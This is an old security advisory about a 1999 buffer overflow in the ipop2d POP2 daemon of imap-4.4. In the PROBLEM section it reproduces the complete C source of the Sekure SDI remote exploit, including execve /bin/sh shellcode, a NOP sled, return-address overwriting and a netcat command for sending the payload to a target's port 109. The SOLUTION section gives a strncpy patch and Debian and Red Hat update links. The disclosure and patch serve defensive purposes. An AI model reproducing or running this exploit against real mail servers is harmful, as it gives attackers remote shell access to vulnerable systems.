COMMAND
ipop2d
SYSTEMS AFFECTED
Imapd
PROBLEM
Following is based on SDI code (the remote exploit for ipop2d).
In order to gain remote access as user nobody, you should set
an IMAP server at your box (just edit the inetd.conf) or at
any other machine which you have an account. During the
anonymous_login() function, the ipop2d will set the uid to user
nobody, so you are not going to get a rootshell.
/*
* Sekure SDI (Brazilian Information Security Team)
* ipop2d remote exploit for linux (Jun, 02 1999)
*
* by c0nd0r <condor@sekure.org>
*
* (read the instructions below)
*
* Thanks to jamez, bahamas, dumped, bishop, slide, paranoia, stderr,
* falcon, vader, c_orb, marty(nordo!) and minha malinha!
* also to #uground (irc.brasnet.org) and #SDI (efnet),
* guys at el8.org, toxyn.org, pulhas.org
*
* Sincere Apologizes: duke (for the mistake we made with the wu-expl),
* your code rocks.
*
* Usage:
*
* SDI-pop2 <imap_server> <user> <pass> [offset]
*
* where imap_server = IMAP server at your box (or other place as well)
* user = any account at your box
* pass = the account's password
* offset = 0 is default -- increase if it's necessary.
*
* Example: (netcat rocks)
*
* (./SDI-pop ppp-666.lame.org rewt lame 0; cat) | nc lame.org 109
*
*
* We do NOT take any responsability for the consequences of using
* this code -- you've been warned! don't be a script k1dd13!
*
*/
#include <stdio.h>
/*
* (shellcode)
*
* jmp 0x1f
* popl %esi
* movl %esi,0x8(%esi)
* xorl %eax,%eax
* movb %eax,0x7(%esi)
* movl %eax,0xc(%esi)
* movb $0xb,%al
* movl %esi,%ebx
* leal 0x8(%esi),%ecx
* leal 0xc(%esi),%edx
* int $0x80
* xorl %ebx,%ebx
* movl %ebx,%eax
* inc %eax
* int $0x80
* call -0x24
* .string \"/bin/sh\"
* grab your shellcode generator at www.sekure.org
*/
char c0d3[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
main (int argc, char *argv[] ) {
char buf[2500];
int x,y=1000, offset=0;
long addr;
char host[255], user[255], pass[255];
int bsize=986;
if ( argc < 4) {
printf ( "Sekure SDI ipop2d remote exploit - Jun, 02 1999\n");
printf ( "usage:
(SDI-pop2 <imap server> <user> <pass> [offset];cat) | nc lame.org 109\n");
exit (0);
}
snprintf ( host, sizeof(host), "%s", argv[1]);
snprintf ( user, sizeof(user), "%s", argv[2]);
snprintf ( pass, sizeof(pass), "%s", argv[3]);
if ( argc > 4) offset = atoi ( argv[4]);
/* gimme the ret + offset */
addr = 0xbffff3c0 + offset;
fprintf ( stderr, "0wning data since 0x%x\n\n", addr);
/* calculation of the return address position */
bsize -= strlen ( host);
for ( x = 0; x < bsize-strlen(c0d3); x++)
buf[x] = 0x90;
for ( y = 0; y < strlen(c0d3); x++, y++)
buf[x] = c0d3[y];
for ( ; x < 1012; x+=4) {
buf[x ] = addr & 0x000000ff;
buf[x+1] = (addr & 0x0000ff00) >> 8;
buf[x+2] = (addr & 0x00ff0000) >> 16;
buf[x+3] = (addr & 0xff000000) >> 24;
}
sleep (1);
printf ( "HELO %s:%s %s\r\n", host, user, pass);
sleep (1);
printf ( "FOLD %s\r\n", buf);
}
SOLUTION
This patch fixes the buffer overflow:
diff -Nur imap-4.4.orig/src/ipopd/ipop2d.c imap-4.4/src/ipopd/ipop2d.c
--- imap-4.4.orig/src/ipopd/ipop2d.c Thu Jun 3 18:35:15 1999
+++ imap-4.4/src/ipopd/ipop2d.c Thu Jun 3 18:37:02 1999
@@ -10,7 +10,10 @@
* Internet: MRC@CAC.Washington.EDU
*
* Date: 28 October 1990
- * Last Edited: 13 July 1998
+ * Last Edited: 3 June 1999
+ *
+ * dumped (dumped@sekure.org) 3/Jun/99 :
+ * fixed a buffer overflow in c_fold()
*
* Copyright 1998 by the University of Washington
*
@@ -306,7 +309,8 @@
/* don't permit proxy to leave IMAP */
if (stream && stream->mailbox && (s = strchr (stream->mailbox,'}'))) {
strncpy (tmp,stream->mailbox,i = (++s - stream->mailbox));
- strcpy (tmp+i,t); /* append mailbox to initial spec */
+ strncpy (tmp+i,t,sizeof(tmp) - strlen(stream->mailbox));
+ /* append mailbox to initial spec */
t = tmp;
}
/* open mailbox, note # of messages */
This problem was fixed several months ago. The fix is in the
current distribution version. imap-4.4 is an old version. Debian
GNU/Linux 2.1 alias slink:
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.diff.gz
http://security.debian.org/dists/stable/updates/source/imap_4.5-0slink2.dsc
http://security.debian.org/dists/stable/updates/source/imap_4.5.orig.tar.gz
http://security.debian.org/dists/stable/updates/binary-sparc/c-client-dev_4.5-0slink2_sparc.deb
http://security.debian.org/dists/stable/updates/binary-sparc/imap_4.5-0slink2_sparc.deb
http://security.debian.org/dists/stable/updates/binary-sparc/ipopd_4.5-0slink2_sparc.deb
http://security.debian.org/dists/stable/updates/binary-i386/c-client-dev_4.5-0slink2_i386.deb
http://security.debian.org/dists/stable/updates/binary-i386/imap_4.5-0slink2_i386.deb
http://security.debian.org/dists/stable/updates/binary-i386/ipopd_4.5-0slink2_i386.deb
http://security.debian.org/dists/stable/updates/binary-m68k/c-client-dev_4.5-0slink2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-m68k/imap_4.5-0slink2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-m68k/ipopd_4.5-0slink2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-alpha/c-client-dev_4.5-0slink2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-alpha/imap_4.5-0slink2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-alpha/ipopd_4.5-0slink2_alpha.deb
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
For RedHat (4.x, 5.x):
rpm -Uvh ftp://updates.redhat.com/4.2/alpha/imap-4.5-0.4.2.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/4.2/i386/imap-4.5-0.4.2.i386.rpm
rpm -Uvh ftp://updates.redhat.com/4.2/sparc/imap-4.5-0.4.2.sparc.rpm
ftp://updates.redhat.com/4.2/SRPMS/imap-4.5-0.4.2.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/imap-4.5-0.5.2.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/imap-4.5-0.5.2.sparc.rpm
ftp://updates.redhat.com/5.2/SRPMS/imap-4.5-0.5.2.src.rpm